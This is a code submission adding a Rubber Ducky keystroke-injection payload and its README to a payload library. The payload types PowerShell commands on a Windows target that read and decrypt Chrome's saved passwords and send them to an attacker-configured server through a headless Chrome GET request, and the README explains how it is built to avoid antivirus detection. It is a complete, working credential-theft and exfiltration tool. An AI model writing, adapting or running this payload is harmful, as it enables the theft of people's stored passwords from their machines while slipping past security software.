Submission

payloads/library/exfiltration/chrome-exfil/README.md

@@ -0,0 +1,55 @@
+# Chrome saved-credentials exfiltration
+
+A script to exfiltrate Chrome browser credentials from a target. Entered
+interactively to bypass a lot of PowerShell-related AV triggers.
+
+The Chrome GET request exfil is low bandwidth, but shouldn't raise the same
+level of AV-detection alarm as Invoke-WebRequest.
+
+## Dependencies
+
+ * Windows 10
+ * PowerShell 5.1<br />
+   (or PowerShell 7.x if you want to capture post-Chrome-v80 passwords)
+ * Chrome
+
+## Configuration
+
+Change `http://localhost:8000/` to match a target-accessible server you've set
+up.
+
+## Example execution
+
+Passwords stored in Chrome:
+
+![](img/chrome.png)
+
+Ducky script running, with temporary Python server to capture the
+exfiltration:
+
+![](img/run.gif)
+
+The base64 string sent to the server
+(`aHR0cHM6Ly9leGFtcGxlLmNvbS8sZXhhbXBsZV91c2VyMSxleEBtcGwzUEFTU3cwckQh`)
+decodes to `https://example.com/,example_user1,ex@mpl3PASSw0rD!`.
+
+## Limitations
+
+There are various limitations around maximum URL lengths, you may run in to
+these with Chrome instances containing a lot of saved passwords. A ZIP
+compression pass would probably resolve this, or multiple GET requests.
+
+I haven't tested this with Unicode passwords.
+
+## Credits
+
+This script is based on the minification of my
+[chrome-decrypt.ps1](https://github.com/thisismyrobot/chrome-decrypt.ps1)
+script, which itself built upon these projects:
+
+ * https://github.com/p0z/CPD
+ * https://github.com/ValterBricca/SQLite.Net-PCL
+ * https://github.com/ericsink/SQLitePCL.raw
+ * https://github.com/byt3bl33d3r/chrome-decrypter
+ * https://github.com/agentzex/chrome_v80_password_grabber
+ * https://github.com/0xfd3/Chrome-Password-Recovery

payloads/library/exfiltration/chrome-exfil/payload.txt

@@ -0,0 +1,64 @@
+REM Title: Chrome Exfil
+REM Author: thisismyrobot
+REM Description: Opens PowerShell, grabs Chrome passwords, exfils via headless Chrome GET request.
+REM Target: Windows 10 (PowerShell + Chrome)
+REM Version: 1.0
+REM Category: Exfiltration
+DEFAULTDELAY 10
+DELAY 5000
+GUI r
+DELAY 250
+STRING powershell
+ENTER
+DELAY 2500
+STRING pwsh
+ENTER
+DELAY 2500
+STRING $d=Add-Type -A System.Security
+ENTER
+STRING $p='public static'
+ENTER
+STRING $g=""")]$p extern"
+ENTER
+STRING $i='[DllImport("winsqlite3",EntryPoint="sqlite3_'
+ENTER
+STRING $m="[MarshalAs(UnmanagedType.LP"
+ENTER
+STRING $q='(s,i)'
+ENTER
+STRING $f='(p s,int i)'
+ENTER
+STRING $z=$env:LOCALAPPDATA+'\Google\Chrome\User Data'
+ENTER
+STRING $u=[Security.Cryptography.ProtectedData]
+ENTER
+STRING Add-Type "using System.Runtime.InteropServices;using p=System.IntPtr;$p class W{$($i)open$g p O($($m)Str)]string f,out p d);$($i)prepare16_v2$g p P(p d,$($m)WStr)]string l,int n,out p s,p t);$($i)step$g p S(p s);$($i)column_text16$g p C$f;$($i)column_bytes$g int Y$f;$($i)column_blob$g p L$f;$p string T$f{return Marshal.PtrToStringUni(C$q);}$p byte[] B$f{var r=new byte[Y$q];Marshal.Copy(L$q,r,0,Y$q);return r;}}"
+ENTER
+STRING $s=[W]::O("$z\\Default\\Login Data",[ref]$d)
+ENTER
+STRING $l=@()
+ENTER
+STRING if($host.Version-like"7*"){$b=(gc "$z\\Local State"|ConvertFrom-Json).os_crypt.encrypted_key
+ENTER
+STRING $x=[Security.Cryptography.AesGcm]::New($u::Unprotect([Convert]::FromBase64String($b)[5..($b.length-1)],$n,0))}$_=[W]::P($d,"SELECT*FROM logins WHERE blacklisted_by_user=0",-1,[ref]$s,0)
+ENTER
+STRING for(;!([W]::S($s)%100)){$l+=[W]::T($s,0),[W]::T($s,3)
+ENTER
+STRING $c=[W]::B($s,5)
+ENTER
+STRING try{$e=$u::Unprotect($c,$n,0)}catch{if($x){$k=$c.length
+ENTER
+STRING $e=[byte[]]::new($k-31)
+ENTER
+STRING $x.Decrypt($c[3..14],$c[15..($k-17)],$c[($k-16)..($k-1)],$e)}}$l+=($e|%{[char]$_})-join''}
+ENTER
+STRING $r=[Convert]::ToBase64String([Text.Encoding]::ASCII.GetBytes(($l)-join','))
+ENTER
+STRING start-process "chrome" "--headless http://localhost:8000/?$r"
+ENTER
+DELAY 1000
+STRING exit
+ENTER
+DELAY 250
+STRING exit
+ENTER